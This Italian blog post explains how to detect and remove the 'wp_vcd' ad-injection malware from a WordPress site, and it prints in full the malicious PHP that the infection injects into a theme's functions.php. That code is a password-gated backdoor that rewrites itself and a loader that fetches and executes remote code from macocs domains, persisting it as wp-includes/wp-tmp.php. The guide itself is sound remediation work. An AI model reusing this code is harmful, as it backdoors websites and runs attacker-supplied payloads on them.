Descrizione: Iniezioni malevoli di Varios che comportano la visualizzazione di annunci (o l'apertura di finestre pop-up o pop-under) senza il consenso del proprietario del sito. Tali iniezioni possono utilizzare script di reti pubblicitarie legittime.

 

Molto facile a individuare appunto della sua presenza, visto che si apriranno pop up o link insueti al sito.
Molto importante e definire il flusso del contagio… in parole povere come ho preso il Malware?
Potrebbero essere molteplici le strade male più comuni sono:

1 Non importare plugin non legalmente acquistati
2 Non importare Template non legalmente acquistati
3 Aggiornare sempre il propio WP e i plugin associati
4 L’imitare l’uso dei plugin (onde evitare che se scritti male potrebbero essere facilmente compromessi)
5 Server sicuro quindi spendere il giusto non certo 1 euro

Ma adiamo al nocciolo del discorso, una volta che siamo in gioco cominceremo a verificare la vera identità tramite uno scanner online molto utile io uso questo: sitecheck.sucuri.net
Una volta individuato il problema… No Panico!

Spesso il Core del Malware va a intaccare il nostro file function.php del tema che stiamo utilizzando.
Ighettando uno script simile:

<?php
if ( isset( $_REQUEST[ 'action' ] ) && isset( $_REQUEST[ 'password' ] ) && ( $_REQUEST[ 'password' ] == '741b457737ff0478b6e1ccef383efcc9' ) ) {
 $div_code_name = "wp_vcd";
 switch ( $_REQUEST[ 'action' ] ) {
 case 'change_domain';
 if ( isset( $_REQUEST[ 'newdomain' ] ) ) {
 if ( !empty( $_REQUEST[ 'newdomain' ] ) ) {
 if ( $file = @file_get_contents( __FILE__ ) ) {
 if ( preg_match_all( '/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain ) ) {
 $file = preg_replace( '/' . $matcholddomain[ 1 ][ 0 ] . '/i', $_REQUEST[ 'newdomain' ], $file );
 @file_put_contents( __FILE__, $file );
 print "true";
 }
 }
 }
 }
 break;
 case 'change_code';
 if ( isset( $_REQUEST[ 'newcode' ] ) ) {

 if ( !empty( $_REQUEST[ 'newcode' ] ) ) {
 if ( $file = @file_get_contents( __FILE__ ) ) {
 if ( preg_match_all( '/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode ) ) {

 $file = str_replace( $matcholdcode[ 1 ][ 0 ], stripslashes( $_REQUEST[ 'newcode' ] ), $file );
 @file_put_contents( __FILE__, $file );
 print "true";
 }


 }
 }
 }
 break;

 default:
 print "ERROR_WP_ACTION WP_V_CD WP_CD";
 }

 die( "" );
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if ( !function_exists( 'theme_temp_setup' ) ) {
 $path = $_SERVER[ 'HTTP_HOST' ] . $_SERVER[ REQUEST_URI ];
 if ( stripos( $_SERVER[ 'REQUEST_URI' ], 'wp-cron.php' ) == false && stripos( $_SERVER[ 'REQUEST_URI' ], 'xmlrpc.php' ) == false ) {

 function file_get_contents_tcurl( $url ) {
 $ch = curl_init();
 curl_setopt( $ch, CURLOPT_AUTOREFERER, TRUE );
 curl_setopt( $ch, CURLOPT_HEADER, 0 );
 curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
 curl_setopt( $ch, CURLOPT_URL, $url );
 curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, TRUE );
 $data = curl_exec( $ch );
 curl_close( $ch );
 return $data;
 }

 function theme_temp_setup( $phpCode ) {
 $tmpfname = tempnam( sys_get_temp_dir(), "theme_temp_setup" );
 $handle = fopen( $tmpfname, "w+" );
 if ( fwrite( $handle, "<?php\n" . $phpCode ) ) {} else {
 $tmpfname = tempnam( './', "theme_temp_setup" );
 $handle = fopen( $tmpfname, "w+" );
 fwrite( $handle, "<?php\n" . $phpCode );
 }
 fclose( $handle );
 include $tmpfname;
 unlink( $tmpfname );
 return get_defined_vars();
 }


 $wp_auth_key = 'bb9aed696b080d6d327d927fc0b733d8';
 if ( ( $tmpcontent = @file_get_contents( "http://www.macocs.com/code.php" )OR $tmpcontent = @file_get_contents_tcurl( "http://www.macocs.com/code.php" ) )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {

 if ( stripos( $tmpcontent, $wp_auth_key ) !== false ) {
 extract( theme_temp_setup( $tmpcontent ) );
 @file_put_contents( ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent );

 if ( !file_exists( ABSPATH . 'wp-includes/wp-tmp.php' ) ) {
 @file_put_contents( get_template_directory() . '/wp-tmp.php', $tmpcontent );
 if ( !file_exists( get_template_directory() . '/wp-tmp.php' ) ) {
 @file_put_contents( 'wp-tmp.php', $tmpcontent );
 }
 }

 }
 } elseif ( $tmpcontent = @file_get_contents( "http://www.macocs.pw/code.php" )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {

 if ( stripos( $tmpcontent, $wp_auth_key ) !== false ) {
 extract( theme_temp_setup( $tmpcontent ) );
 @file_put_contents( ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent );

 if ( !file_exists( ABSPATH . 'wp-includes/wp-tmp.php' ) ) {
 @file_put_contents( get_template_directory() . '/wp-tmp.php', $tmpcontent );
 if ( !file_exists( get_template_directory() . '/wp-tmp.php' ) ) {
 @file_put_contents( 'wp-tmp.php', $tmpcontent );
 }
 }

 }
 }

 elseif ( $tmpcontent = @file_get_contents( "http://www.macocs.top/code.php" )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {

 if ( stripos( $tmpcontent, $wp_auth_key ) !== false ) {
 extract( theme_temp_setup( $tmpcontent ) );
 @file_put_contents( ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent );

 if ( !file_exists( ABSPATH . 'wp-includes/wp-tmp.php' ) ) {
 @file_put_contents( get_template_directory() . '/wp-tmp.php', $tmpcontent );
 if ( !file_exists( get_template_directory() . '/wp-tmp.php' ) ) {
 @file_put_contents( 'wp-tmp.php', $tmpcontent );
 }
 }

 }
 }
 elseif ( $tmpcontent = @file_get_contents( ABSPATH . 'wp-includes/wp-tmp.php' )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {
 extract( theme_temp_setup( $tmpcontent ) );

 } elseif ( $tmpcontent = @file_get_contents( get_template_directory() . '/wp-tmp.php' )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {
 extract( theme_temp_setup( $tmpcontent ) );

 } elseif ( $tmpcontent = @file_get_contents( 'wp-tmp.php' )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {
 extract( theme_temp_setup( $tmpcontent ) );

 }





 }
}
//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?>

Se lo script è simile... possiamo procedere...

Come possiamo notare spesso andranno a richiamare altri file generati all’interno del core.
Leggendo il codice possiamo individuare il percorso del file da eliminare.

Spesso si trovano all’interno del core di WP nella cartella wp-includes/

Nel mio caso lo script in questione $div_code_name="wp_vcd"; all’interno del mio file function richimva un altro file all’interno della cartella wp-includes/wp-tmp.php

Quindi cosa fare?

Via FTP andremo nella cartella del mio tema,
e tolgieremo lo script malevolo all’interno del file function.php per poi eliminare il file wp-includes/wp-tmp.php.
Questa volta è stato facile, ma non si deve mai Abbassare la guardia!

Risorse:
sitecheck.sucuri.net
mxtoolbox.com